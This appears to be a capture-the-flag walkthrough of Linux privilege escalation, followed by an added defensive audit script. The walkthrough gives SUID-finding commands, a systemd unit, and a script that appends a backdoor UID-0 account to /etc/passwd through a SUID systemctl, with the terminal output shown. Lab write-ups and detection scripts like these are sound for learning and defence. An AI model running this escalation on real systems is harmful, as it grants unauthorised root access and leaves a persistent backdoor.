SUID wins!
SUID: the file runs with the permissions of its owner (if the owner is root, it runs as root).
Find SUID binaries:
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
find / -uid 0 -perm -4000 -type f 2>/dev/null
Or, when the SUID binary is systemctl, create a service unit that executes /dev/shm/root.sh:
[Unit]
Description=pwned
[Service]
ExecStart=/dev/shm/root.sh
[Install]
WantedBy=multi-user.target
and create /dev/shm/root.sh, which appends a second UID-0 account to /etc/passwd:
rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash
pepper@jarvis:/dev/shm$ nano root.service
pepper@jarvis:/dev/shm$ cat root.service
[Unit]
Description=pwned
[Service]
ExecStart=/dev/shm/root.sh
[Install]
WantedBy=multi-user.target
pepper@jarvis:/dev/shm$ nano root.sh
pepper@jarvis:/dev/shm$ chmod +x root.sh
pepper@jarvis:/dev/shm$ cat root.sh
#!/bin/bash
echo 'rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash' >> /etc/passwd
pepper@jarvis:/dev/shm$
I enabled the service and started it:
pepper@jarvis:/dev/shm$ systemctl enable /dev/shm/root.service
Created symlink /etc/systemd/system/multi-user.target.wants/root.service -> /dev/shm/root.service.
Created symlink /etc/systemd/system/root.service -> /dev/shm/root.service.
pepper@jarvis:/dev/shm$ systemctl start root.service
pepper@jarvis:/dev/shm$
Check /etc/passwd for the new line, then su rooot with those credentials.
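The technique above leaves two traces a defender can look for: a second UID-0 account whose password hash sits directly in /etc/passwd instead of /etc/shadow, and an enabled unit symlink under /etc/systemd/system pointing into /dev/shm. The following audit script is an added example, not part of the original page; it runs against constructed sample files (the passwd lines and the symlink target are assumptions, not a real system).

```shell
#!/bin/sh
# Added defender-side audit (not code from the original page). Sample data below
# is constructed for the demo; on a real host point the functions at /etc/passwd
# and /etc/systemd/system instead.

# Print one line per suspicious /etc/passwd entry: UID 0 under a name other than
# root, or a hash in field 2 (healthy entries carry "x", "*" or a "!" lock there).
audit_passwd() {   # usage: audit_passwd <passwd-file>
    awk -F: '
        $3 == 0 && $1 != "root"                          { print "extra-uid0", $1 }
        $2 != "x" && $2 != "*" && $2 !~ /^!/ && $2 != "" { print "inline-hash", $1 }
    ' "$1"
}

# Print one line per unit symlink under <unit-dir> whose target lies outside the
# packaged unit locations; "systemctl enable /dev/shm/root.service" creates
# exactly such a link.
audit_units() {    # usage: audit_units <unit-dir>
    find "$1" -type l 2>/dev/null | while read -r link; do
        target=$(readlink "$link")
        case "$target" in
            /etc/systemd/*|/lib/systemd/*|/usr/lib/systemd/*) ;;
            *) echo "suspicious-unit $link -> $target" ;;
        esac
    done
}

# Build constructed sample data and run both checks against it.
demo() {
    work=$(mktemp -d)
    cat > "$work/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
pepper:x:1000:1000:pepper:/home/pepper:/bin/bash
rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash
EOF
    mkdir -p "$work/shm" "$work/system/multi-user.target.wants"
    : > "$work/shm/root.service"
    ln -s "$work/shm/root.service" "$work/system/root.service"
    ln -s /lib/systemd/system/ssh.service "$work/system/multi-user.target.wants/ssh.service"
    audit_passwd "$work/passwd"   # flags rooot twice (extra-uid0, inline-hash)
    audit_units "$work/system"    # flags root.service only, not the packaged ssh link
    rm -rf "$work"
}

demo
```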